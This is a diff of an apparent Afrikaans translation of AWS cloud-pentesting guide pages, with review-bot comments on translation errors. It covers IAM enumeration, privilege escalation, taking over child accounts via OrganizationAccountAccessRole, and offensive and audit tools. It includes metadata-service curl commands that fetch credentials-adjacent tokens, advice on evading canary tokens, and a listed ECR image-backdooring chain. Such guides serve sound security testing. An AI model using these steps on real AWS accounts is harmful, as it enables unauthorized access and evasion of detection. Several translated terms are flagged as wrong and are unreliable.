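Review bot: in the @@ -22,49 hunk, `+- Kw vulnerabilities in AWS-gehoste toepassings` is a half-translated fragment of "Vulnerabilities in AWS-Hosted Applications" and should read `- Kwesbaarhede in AWS-gehoste toepassings`; the SSRF, Local File Read and `.aws/credentials` bullets beneath it also dropped their indentation, so they are no longer nested under that item. "Credentials" is rendered as `akkrediteerbare` (which means "accreditable") in this hunk and as `akrediteer` later in the file; pick one term (the book generally keeps English technical terms, so `credentials`, or otherwise `geloofsbriewe`) and use it consistently. `**vraag vir akkrediteerbare**` should be `vra vir`.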
@@ -89,117 +88,113 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document ``` - > [!CAUTION] -> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ -> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). +> Let daarop dat maatskappye **kanarie tokens** kan gebruik om te identifiseer wanneer **tokens gesteel en gebruik** word. Dit word aanbeveel om te kontroleer of 'n token 'n kanarie token is of nie voordat jy dit gebruik.\ +> Vir meer inligting [**kyk na hierdie bladsy**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). -### Org Enumeration +### Organisasie Enumerasie {{#ref}} aws-services/aws-organizations-enum.md {{#endref}} -### IAM Enumeration +### IAM Enumerasie -If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**. +As jy genoeg regte het, sal **die privileges van elke entiteit binne die AWS-rekening nagaan** jou help om te verstaan wat jy en ander identiteite kan doen en hoe om **privileges te verhoog**. 
-If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\ -Check **how to do the numeration and brute-forcing** in: +As jy nie genoeg regte het om IAM te enumerate nie, kan jy dit **steal bruteforce** om dit uit te vind.\ +Kyk **hoe om die numerasie en bruteforcing** te doen in: {{#ref}} aws-services/aws-iam-enum.md {{#endref}} > [!NOTE] -> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -> In the following section you can check some ways to **enumerate some common services.** +> Nou dat jy **'n paar inligting oor jou akrediteer** (en as jy 'n rooi span is hoop ek jy **is nie opgespoor nie**). Dit is tyd om uit te vind watter dienste in die omgewing gebruik word.\ +> In die volgende afdeling kan jy 'n paar maniere kyk om **'n paar algemene dienste te enumerate.** -## Services Enumeration, Post-Exploitation & Persistence +## Dienste Enumerasie, Post-Exploitation & Persistensie -AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them: +AWS het 'n verbasende hoeveelheid dienste, in die volgende bladsy sal jy **basiese inligting, enumerasie** cheatsheets\*\*,\*\* hoe om **opsporing te vermy**, **persistensie** te verkry, en ander **post-exploitation** truuks oor sommige van hulle vind: {{#ref}} aws-services/ {{#endref}} -Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools). +Let daarop dat jy **nie** al die werk **handmatig** hoef te doen nie, hieronder in hierdie pos kan jy 'n **afdeling oor** [**outomatiese gereedskap**](./#automated-tools) vind. 
-Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them: +Boonop, in hierdie fase mag jy **meer dienste ontdek wat aan nie-geverifieerde gebruikers blootgestel is,** jy mag in staat wees om dit te benut: {{#ref}} aws-unauthenticated-enum-access/ {{#endref}} -## Privilege Escalation +## Privilege Verhoging -If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in: +As jy **ten minste jou eie regte** oor verskillende hulpbronne kan **nagaan**, kan jy **nagaan of jy in staat is om verdere regte te verkry**. Jy moet ten minste fokus op die regte wat in: {{#ref}} aws-privilege-escalation/ {{#endref}} -## Publicly Exposed Services +## Publiek Blootgestelde Dienste -While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\ -As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**. +Terwyl jy AWS-dienste enumerate, mag jy sommige van hulle gevind het wat **elemente aan die Internet blootstel** (VM/Containers poorte, databasisse of wagdiens, snapshots of emmers...).\ +As pentester/rooi spaner moet jy altyd kyk of jy **sensitiewe inligting / kwesbaarhede** op hulle kan vind aangesien dit jou **verdere toegang tot die AWS-rekening** kan bied. -In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in: +In hierdie boek behoort jy **inligting** te vind oor hoe om **blootgestelde AWS-dienste te vind en hoe om dit te kontroleer**. 
Oor hoe om **kwesbaarhede in blootgestelde netwerkdienste** te vind, sou ek jou aanbeveel om te **soek** na die spesifieke **diens** in: {{#ref}} https://book.hacktricks.xyz/ {{#endref}} -## Compromising the Organization +## Kompromitering van die Organisasie -### From the root/management account +### Van die wortel/ bestuursrekening -When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account. +Wanneer die bestuursrekening nuwe rekeninge in die organisasie skep, word 'n **nuwe rol** in die nuwe rekening geskep, standaard genoem **`OrganizationAccountAccessRole`** en gee **AdministratorAccess** beleid aan die **bestuursrekening** om toegang tot die nuwe rekening te verkry.
-So, in order to access as administrator a child account you need: +So, om as administrateur toegang tot 'n kindrekening te verkry, moet jy: -- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. - - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` - - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. -- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). +- **Kompromiteer** die **bestuurs** rekening en vind die **ID** van die **kindrekening** en die **name** van die **rol** (OrganizationAccountAccessRole per standaard) wat die bestuursrekening toelaat om as admin toegang te verkry. +- Om kindrekeninge te vind, gaan na die organisasieseksie in die aws-konsol of voer `aws organizations list-accounts` uit. +- Jy kan nie die name van die rolle direk vind nie, so kyk na al die persoonlike IAM-beleide en soek enige wat **`sts:AssumeRole` oor die voorheen ontdekte kindrekeninge** toelaat. +- **Kompromiteer** 'n **hoof** in die bestuursrekening met **`sts:AssumeRole` toestemming oor die rol in die kindrekeninge** (selfs as die rekening enige iemand van die bestuursrekening toelaat om te verpersoonlik, aangesien dit 'n eksterne rekening is, is spesifieke `sts:AssumeRole` toestemmings nodig). 
-## Automated Tools +## Outomatiese Gereedskap ### Recon -- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. - +- [**aws-recon**](https://github.com/darkbitio/aws-recon): 'n multi-draad AWS sekuriteitsgefokusde **inventaris versamelingsgereedskap** geskryf in Ruby. ```bash # Install gem install aws_recon # Recon and get json AWS_PROFILE= aws_recon \ - --services S3,EC2 \ - --regions global,us-east-1,us-east-2 \ - --verbose +--services S3,EC2 \ +--regions global,us-east-1,us-east-2 \ +--verbose ``` - -- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. -- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. - +- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is 'n **multi-cloud hulpmiddel om Bate** (Gasname, IP Adresse) van Cloud Verskaffers te verkry. +- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper help jou om jou Amazon Web Services (AWS) omgewings te analiseer. Dit bevat nou baie meer funksionaliteit, insluitend ouditering vir sekuriteitskwessies. ```bash # Installation steps in github # Create a config.json file with the aws info, like: { - "accounts": [ - { - "default": true, - "id": "", - "name": "dev" - } - ], - "cidrs": - { - "2.2.2.2/28": {"name": "NY Office"} - } +"accounts": [ +{ +"default": true, +"id": "", +"name": "dev" +} +], +"cidrs": +{ +"2.2.2.2/28": {"name": "NY Office"} +} } # Enumerate 
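Review bot: the in-page link `[**outomatiese gereedskap**](./#automated-tools)` breaks once the heading `## Automated Tools` becomes `## Outomatiese Gereedskap`, because mdBook derives the anchor from the heading text; either keep the English heading or change the fragment to `#outomatiese-gereedskap`. Two typos from the source were carried into the translation instead of being fixed: `**steal bruteforce**` is "still brute-force" (`steeds brute-force`) and `numerasie` should be `enumerasie`. `'n **hoof**` for "a principal" and `wortel/ bestuursrekening` for "root/management account" mistranslate IAM terms that the rest of the book leaves in English (`principal`, `root`), and `wagdiens`/`emmers` for queue services/buckets should likewise stay `queue`/`buckets`. The three sub-bullets under `**Kompromiteer** die **bestuurs** rekening` lost their indentation as well.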
@@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev python cloudmapper.py prepare #Prepare webserver python cloudmapper.py webserver #Show webserver ``` - -- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. - +- [**cartography**](https://github.com/lyft/cartography): Cartography is 'n Python-gereedskap wat infrastruktuur bates en die verhoudings tussen hulle in 'n intuĂŻtiewe grafiekweergave saamvoeg, aangedryf deur 'n Neo4j-databasis. ```bash # Install pip install cartography 
@@ -240,17 +233,15 @@ pip install cartography # Get AWS info AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j ``` - -- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. -- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account. -- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account. +- [**starbase**](https://github.com/JupiterOne/starbase): Starbase versamel bates en verhoudings van dienste en stelsels, insluitend wolkinfrastruktuur, SaaS-toepassings, sekuriteitsbeheer en meer in 'n intuĂŻtiewe grafiekweergave wat deur die Neo4j-databasis ondersteun word. +- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Gebruik python2) Dit is 'n hulpmiddel wat probeer om **alle** [**AWS hulpbronne**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) wat in 'n rekening geskep is, te **ontdek**. +- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): Dit is 'n hulpmiddel om **alle publieke IP-adresse** (beide IPv4/IPv6) wat met 'n AWS-rekening geassosieer is, te **verkry**. ### Privesc & Exploiting -- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. 
You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). -- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict. - - Note that pacu **only checks your own privescs paths** (not account wide). - +- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Ontdek die mees bevoorregte gebruikers in die gescande AWS-omgewing, insluitend die AWS Shadow Admins. Dit gebruik powershell. Jy kan die **definisie van bevoorregte beleide** in die funksie **`Check-PrivilegedPolicy`** vind in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). +- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is 'n oopbron **AWS eksploitering raamwerk**, ontwerp vir offensiewe sekuriteitstoetsing teen wolkomgewings. Dit kan **opnoem**, **mis-konfigurasies** vind en dit **eksploiteer**. 
Jy kan die **definisie van bevoorregte toestemmings** vind in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) binne die **`user_escalation_methods`** dict. +- Let daarop dat pacu **slegs jou eie privesc-paaie nagaan** (nie rekeningwyd nie). ```bash # Install ## Feel free to use venvs 
@@ -264,9 +255,7 @@ pacu > exec iam__enum_permissions # Get permissions > exec iam__privesc_scan # List privileged permissions ``` - -- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) - +- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is 'n skrif en biblioteek vir die identifisering van risiko's in die konfigurasie van AWS Identity and Access Management (IAM) vir 'n AWS-rekening of 'n AWS-organisasie. Dit modelleer die verskillende IAM-gebruikers en rolle in 'n rekening as 'n gerigte grafiek, wat toelaat dat kontroles vir **privilege escalation** en vir alternatiewe paaie wat 'n aanvaller kan neem om toegang tot 'n hulpbron of aksie in AWS te verkry, gedoen word. Jy kan die **permissions used to find privesc** paaie in die lĂȘername wat eindig op `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) nagaan. ```bash # Install pip install principalmapper 
@@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins pmapper --profile dev orgs create pmapper --profile dev orgs display ``` - -- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\ - It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use). - +- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is 'n AWS IAM Sekuriteitsbeoordeling hulpmiddel wat oortredings van die minste voorreg identifiseer en 'n risiko-geprioritiseerde HTML-verslag genereer.\ +Dit sal jou moontlik **oorvoorregte** kliĂ«nt, inline en aws **beleide** wys en watter **beginsels toegang tot hulle het**. (Dit kontroleer nie net vir privesc nie, maar ook ander soort interessante toestemmings, dit word aanbeveel om te gebruik). ```bash # Install pip install cloudsplaining 
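Review bot: in the cloudsplaining description, `watter **beginsels toegang tot hulle het**` translates "principals" as `beginsels` (principles); the IAM term should stay `principals`, as in the English text and the other tool descriptions.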
@@ -303,24 +290,20 @@ cloudsplaining download --profile dev # Analyze the IAM policies cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/ ``` - -- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations. -- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image -- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in. +- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack evalueer AWS-rekeninge vir **subdomein-hijacking kwesbaarhede** as gevolg van ontkoppelde Route53 en CloudFront konfigurasies. +- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): Lys ECR repos -> Trek ECR repo -> Agterdeur dit -> Stoot agterdeur beeld +- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is 'n hulpmiddel wat **soek** deur openbare Elastic Block Storage (**EBS) snappies vir geheime** wat dalk per ongeluk agtergelaat is. ### Audit -- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins). 
- +- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit deur Aqua is 'n oopbronprojek wat ontwerp is om die opsporing van **veiligheidsrisiko's in wolkinfrastruktuur** rekeninge moontlik te maak, insluitend: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), en GitHub (Dit soek nie na ShadowAdmins nie). ```bash ./index.js --csv=file.csv --console=table --config ./config.js # Compiance options: --compliance {hipaa,cis,cis1,cis2,pci} ## use "cis" for cis level 1 and 2 ``` - -- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. - +- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is 'n Open Source sekuriteitstoepassing om AWS sekuriteit beste praktyke assesserings, ouditte, insidentrespons, deurlopende monitering, verharding en forensiese gereedheid uit te voer. ```bash # Install python3, jq and git # Install 
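Review bot: in the Dufflebag line, `(**EBS) snappies` is not a translation of "snapshots"; keep `EBS snapshots`, which is the AWS term used elsewhere in the book. The `# Compiance options:` typo in the cloudsploit block is pre-existing context and could be corrected in the same pass (`# Compliance options:`).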
@@ -331,15 +314,11 @@ prowler -v prowler prowler aws --profile custom-profile [-M csv json json-asff html] ``` - -- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure. - +- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox help jou om situasionele bewustheid te verkry in onbekende wolkomgewings. Dit is 'n oopbron-opdraglyn hulpmiddel wat geskep is om penetrasietoetsers en ander offensiewe sekuriteitsprofessionals te help om ontginbare aanvalspaaie in wolkinfrastruktuur te vind. ```bash cloudfox aws --profile [profile-name] all-checks ``` - -- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. - +- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is 'n oopbron multi-cloud sekuriteitsouditering hulpmiddel, wat sekuriteitsposisie assessering van wolkomgewings moontlik maak. ```bash # Install virtualenv -p python3 venv 
@@ -350,18 +329,16 @@ scout --help # Get info scout aws -p dev ``` +- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (gebruik python2.7 en lyk ononderhoude) +- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is 'n kragtige hulpmiddel vir AWS EC2 / S3 / CloudTrail / CloudWatch / KMS beste versterking praktyke (lyk ononderhoude). Dit kontroleer slegs standaard geconfigureerde kredensies binne die stelsel. -- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained) -- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system. +### Konstante Oudit -### Constant Audit - -- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting. -- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions. 
-- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response. - -## DEBUG: Capture AWS cli requests +- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is 'n reĂ«lsengine vir die bestuur van openbare wolk rekeninge en hulpbronne. Dit stel gebruikers in staat om **beleide te definieer om 'n goed bestuurde wolkinfrastruktuur te enable**, wat beide veilig en koste-geoptimaliseer is. Dit konsolideer baie van die ad-hoc skripte wat organisasies het in 'n liggewig en buigsame hulpmiddel, met verenigde metrieke en verslagdoening. +- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is 'n platform vir **deurlopende nakoming monitering, nakoming verslagdoening en sekuriteit outomatisering vir die wolk**. In PacBot word sekuriteit en nakoming beleide as kode geĂŻmplementeer. Alle hulpbronne wat deur PacBot ontdek word, word geĂ«valueer teen hierdie beleide om beleidskonformiteit te meet. Die PacBot **auto-fix** raamwerk bied die vermoĂ« om outomaties te reageer op beleids oortredings deur vooraf gedefinieerde aksies te neem. +- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is 'n serverless, **regte-tyd** data analise raamwerk wat jou in staat stel om **data van enige omgewing in te neem, te analiseer en te waarsku** , met **data bronne en waarskuwing logika wat jy definieer**. Rekenaar sekuriteitspanne gebruik StreamAlert om terabytes van logdata elke dag te skandeer vir insidentdetectie en -reaksie. +## DEBUG: Capture AWS cli versoeke ```bash # Set proxy export HTTP_PROXY=http://localhost:8080 
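Review bot: the reordered `+`/`-` lines keep the Audit / Constant Audit sections in their original order, but the heading `+## DEBUG: Capture AWS cli versoeke` is half translated and the blank line that separated it from the streamalert bullet was dropped; restore the blank line and either translate the whole heading or leave it in English. In the streamalert line, `regte-tyd` for "real-time" should be `intydse`, and `insidentdetectie` is Dutch spelling (`insidentopsporing`).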
@@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem # Run aws cli normally trusting burp cert aws ... ``` - -## References +## Verwysings - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md index 02e6e7729..4210e4962 100644 --- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md 
@@ -1,331 +1,313 @@ -# AWS - Basic Information +# AWS - Basiese Inligting {{#include ../../../banners/hacktricks-training.md}} -## Organization Hierarchy +## Organisasie HiĂ«rargie ![](<../../../images/image (151).png>) -### Accounts +### Rekeninge -In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them. +In AWS is daar 'n **root rekening,** wat die **ouerhouer is vir al die rekening** vir jou **organisasie**. U hoef egter nie daardie rekening te gebruik om hulpbronne te ontplooi nie, u kan **ander rekeninge skep om verskillende AWS** infrastruktuur van mekaar te skei. -This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments. +Dit is baie interessant vanuit 'n **veiligheid** oogpunt, aangesien **een rekening nie in staat sal wees om hulpbronne van 'n ander rekening te benader** (behalwe as brĂ»e spesifiek geskep word), so op hierdie manier kan u grense tussen ontplooiings skep. -Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts. +Daarom is daar **twee tipes rekeninge in 'n organisasie** (ons praat van AWS rekeninge en nie gebruikersrekeninge nie): 'n enkele rekening wat as die bestuurrekening aangewys word, en een of meer lidrekeninge. -- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: +- Die **bestuurrekening (die root rekening)** is die rekening wat u gebruik om die organisasie te skep. 
Van die organisasie se bestuurrekening kan u die volgende doen: - - Create accounts in the organization - - Invite other existing accounts to the organization - - Remove accounts from the organization - - Manage invitations - - Apply policies to entities (roots, OUs, or accounts) within the organization - - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. - - It's possible to login as the root user using the email and password used to create this root account/organization. +- Skep rekeninge in die organisasie +- Nooi ander bestaande rekeninge na die organisasie +- Verwyder rekeninge uit die organisasie +- Bestuur uitnodigings +- Pas beleide toe op entiteite (wortels, OU's, of rekeninge) binne die organisasie +- Aktiveer integrasie met ondersteunende AWS dienste om diensfunksionaliteit oor al die rekeninge in die organisasie te bied. +- Dit is moontlik om in te log as die root gebruiker met die e-pos en wagwoord wat gebruik is om hierdie root rekening/organisasie te skep. - The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. - -- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. - - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). +Die bestuurrekening het die **verantwoordelikhede van 'n betaler rekening** en is verantwoordelik vir die betaling van alle koste wat deur die lidrekeninge opgeloop word. U kan nie 'n organisasie se bestuurrekening verander nie. +- **Lidrekeninge** maak al die res van die rekeninge in 'n organisasie uit. 
'n Rekening kan slegs 'n lid van een organisasie op 'n slag wees. U kan 'n beleid aan 'n rekening koppel om kontroles slegs op daardie een rekening toe te pas. +- Lidrekeninge **moet 'n geldige e-posadres gebruik** en kan 'n **naam** hĂȘ, in die algemeen sal hulle nie in staat wees om die faktuur te bestuur nie (maar hulle mag toegang daartoe gegee word). ``` aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com ``` +### **Organisasie-eenhede** -### **Organization Units** - -Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children. - +Rekeninge kan gegroepeer word in **Organisasie-eenhede (OU)**. Op hierdie manier kan jy **beleide** vir die Organisasie-eenheid skep wat gaan wees **toegepas op al die kindrekening**. Let daarop dat 'n OU ander OU's as kinders kan hĂȘ. ```bash # You can get the root id from aws organizations list-roots aws organizations create-organizational-unit --parent-id r-lalala --name TestOU ``` - ### Service Control Policy (SCP) -A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**. +'n **service control policy (SCP)** is 'n beleid wat die dienste en aksies spesifiseer wat gebruikers en rolle in die rekeninge wat die SCP beĂŻnvloed, kan gebruik. SCP's is **soortgelyk aan IAM** toestemmingsbeleide, behalwe dat hulle **nie enige toestemmings toeken nie**. 
In plaas daarvan spesifiseer SCP's die **maksimum toestemmings** vir 'n organisasie, organisatoriese eenheid (OU), of rekening. Wanneer jy 'n SCP aan jou organisasie wortel of 'n OU heg, **beperk die SCP toestemmings vir entiteite in lid rekeninge**. -This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\ -The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked). +Dit is die ENIGE manier waarop **selfs die wortelgebruiker gestop kan word** om iets te doen. Byvoorbeeld, dit kan gebruik word om gebruikers te stop om CloudTrail te deaktiveer of rugsteun te verwyder.\ +Die enigste manier om dit te omseil, is om ook die **master account** wat die SCP's konfigureer, te kompromitteer (master account kan nie geblokkeer word nie). > [!WARNING] -> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. +> Let daarop dat **SCP's slegs die principals in die rekening beperk**, so ander rekeninge word nie beĂŻnvloed nie. Dit beteken dat 'n SCP wat `s3:GetObject` weier, nie mense sal stop om **toegang te verkry tot 'n openbare S3-bucket** in jou rekening nie. -SCP examples: +SCP voorbeelde: -- Deny the root account entirely -- Only allow specific regions -- Only allow white-listed services -- Deny GuardDuty, CloudTrail, and S3 Public Block Access from +- Weier die wortelrekening heeltemal +- Laat slegs spesifieke streke toe +- Laat slegs witgelysde dienste toe +- Weier GuardDuty, CloudTrail, en S3 Publieke Blok Toegang van - being disabled +om gedeaktiveer te word -- Deny security/incident response roles from being deleted or +- Weier 